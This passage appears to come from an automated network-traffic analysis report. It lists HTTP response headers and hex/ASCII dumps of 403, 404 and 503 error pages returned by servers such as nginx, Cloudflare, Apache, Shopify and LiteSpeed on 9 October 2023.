30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:56 GMTContent-Type: text/htmlContent-Length: 559Connection: keep-aliveServer: IdeaWebServer/5.2.0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 33 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 69 64 65 61 2f 73 74 61 74 69 63 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 2d 73 74 72 6f 6e 67 22 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 74 65 78 74 22 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 72 72 6f 72 2d 64 65 73 63 72 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 64 6f 63 75 6d 65 6e 74 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 20 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>Error 403</title><link href="/idea/static/style.css" rel="stylesheet"></head><body><div class="error-container"><div class="error-text"><h1>Error</h1></div><div class="error-text-strong"><h1>403</h1></div><div class="error-text"><h1>Forbidden</h1></div></div><div class="error-descr-container"><p>You don't have permission to access this document.</p></div> </body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlServer: Pepyaka/1.21.3X-Wix-Request-Id: 1696859456.797541593618177262X-Content-Type-Options: nosniffAccept-Ranges: bytesDate: Mon, 09 Oct 2023 13:50:56 GMTX-Served-By: cache-bur-kbur8200079-BURX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,dwc60INy8NFddnU/0WdlOB9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb7YIHqi/QJQ19icwuscpsv7Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4514Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:51:12 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yskwJcBiKXnzYmYB5biQTJsXTUBYpzMlfgTP4C6Li%2FBL%2FpX%2F9qfJbpArsUio4JP8bUFU2O5Y0IDtkG4U4JnL6FPqiq4XtV0%2BofqQkOCurSs2nWi4i5To8s%2FnxvjGVjLC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 81371876ae117bf1-LAXData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 Data Ascii: <!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Con
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 09 Oct 2023 13:50:58 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: nginxDate: Mon, 09 Oct 2023 13:50:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedX-Powered-By: PHP/8.2.9Pragma: no-cacheCache-Control: no-cache, must-revalidate, private, max-age=0Expires: Sat, 26 Jul 1997 05:00:00 GMTRetry-After: 3600Data Raw: 34 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 74 69 74 6c 65 3e 59 6f 75 72 20 61 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 73 69 74 65 20 68 61 73 20 62 65 65 6e 20 6c 69 6d 69 74 65 64 20 62 79 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 33 3b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 7d 0a 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 23 30 30 37 30 39 65 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 2c 20 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 3b 0a 09 09 7d 0a 0a 09 09 68 31 2c 20 2e 68 31 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 72 65 6d 3b 20 7d 0a 09 09 68 32 2c 20 2e 68 32 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 33 2c 20 2e 68 33 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35 72 65 6d 3b 20 7d 0a 09 09 68 34 2c 20 2e 68 34 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 72 65 6d 3b 20 7d 0a 09 09 68 35 2c 20 2e 68 35 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 38 37 35 72 65 6d 3b 20 7d 0a 09 09 68 36 2c 20 2e 68 36 20 7b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 2e 37 35 72 65 6d 3b 20 7d 0a 0a 09 09 68 31 2c 20 68 32 2c 20 68 33 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 09 09 68 34 2c 20 68 35 2c 20 68 36 20 7b 0a 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 7d 0a 0a 09 09 2e 77 66 2d 62 74 6e 20 7b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 3b 0a 09 09 09 66 6f 6e 74 2d 77 65 69 67
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:50:58 GMTServer: Apache/2.2.24 (Unix) mod_ssl/2.2.24 OpenSSL/1.0.0-fips mod_uploader/3.2.0Content-Length: 202Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=18X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-us-west2,gcp-us-central1,gcp-us-central1X-Request-ID: 7eae77f0-c21a-4a62-b023-5355e57cfe33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PU3yx62ud00AWP3NnRKXPh2siop8Gzz1SPgFuxZzfR5J5bQaOYkfMd2oUOn%2BmbHWph8o2axjMm%2BKF%2BsvDrI5okdDmEkc9wcL%2B8Ys8cQxCyyaLF4sGJOrVzvExlGrHJg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=89.999914Server: cloudflareCF-RAY: 81371881a84d3104-LAXalt-svc: h3=":443"; ma=86400
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:50:59 GMTServer: ApacheContent-Length: 315Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1229date: Mon, 09 Oct 2023 13:50:59 GMTserver: LiteSpeedx-hostname: ams111.yourwebhoster.comData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 33 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 41 63 63 65 73 73 20 74 6f 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 64 65 6e 69 65 64 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:51:02 GMTContent-Type: text/htmlContent-Length: 0Connection: keep-aliveX-Powered-By: PleskLin
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 09 Oct 2023 13:51:02 GMTServer: ApacheLast-Modified: Tue, 13 Sep 2022 03:21:02 GMTAccept-Ranges: bytesContent-Length: 1260Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html
